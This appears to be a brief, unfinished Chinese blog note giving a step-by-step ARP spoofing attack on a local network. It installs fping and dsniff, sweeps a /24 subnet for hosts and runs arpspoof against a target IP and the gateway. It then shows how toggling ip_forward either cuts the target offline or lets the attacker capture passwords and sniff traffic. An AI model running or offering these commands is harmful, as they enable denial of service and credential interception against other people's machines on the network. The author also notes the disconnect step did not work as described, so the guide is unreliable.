第一步 apt install fping

第二步 apt install dsniff

fping 命令

系统自带的ping命令 是针对单个ip的 

针对多个ip 使用fping

fping -ag 192.168.0.1/24  扫描内网所有192.168.0.X下的所有ip

arpsoopf 命令

-i 网卡名 -t 目标ip 默认网关ip

实战

 fping -ag 192.168.0.1/24

ifconfig    //查看网卡

arpspoof -i ens33 -t 192.168.0.71 192.168.0.1 

因为我这里是ubuntu  所以命令需要sudo权限

步骤就这么点 

需要停止只需要ctrl+c 就行了

题外篇

less /proc/sys/net/ipv4/ip_forward

查看默认是否内网转发的   一般默认值为0   （0 为不转发  1 为转发）

echo 0 > /proc/sys/net/ipv4/ip_forward  关掉转发

echo 1 > /proc/sys/net/ipv4/ip_forward 开启转发

这个流量转发的作用是  当你使用arpsoopf 做arp断网攻击的话 （即：是目标断网）启用 0

反之  若是要做 密码抓取 arp欺骗 或者流量监听什么的 开启1 就好

（通常 这是在kali上去玩的 这样可以避免少踩坑   因为我比较顺手 ubuntu  

所以我有遇到的坑

）

当然 还有一个坑是  arp欺骗成功运行  也less查看了  默认使用不转发了 

但是目标机并没有像网上所说的那样断网    本文笔记还没写完 后续我有空会去弄清楚 把笔记完善的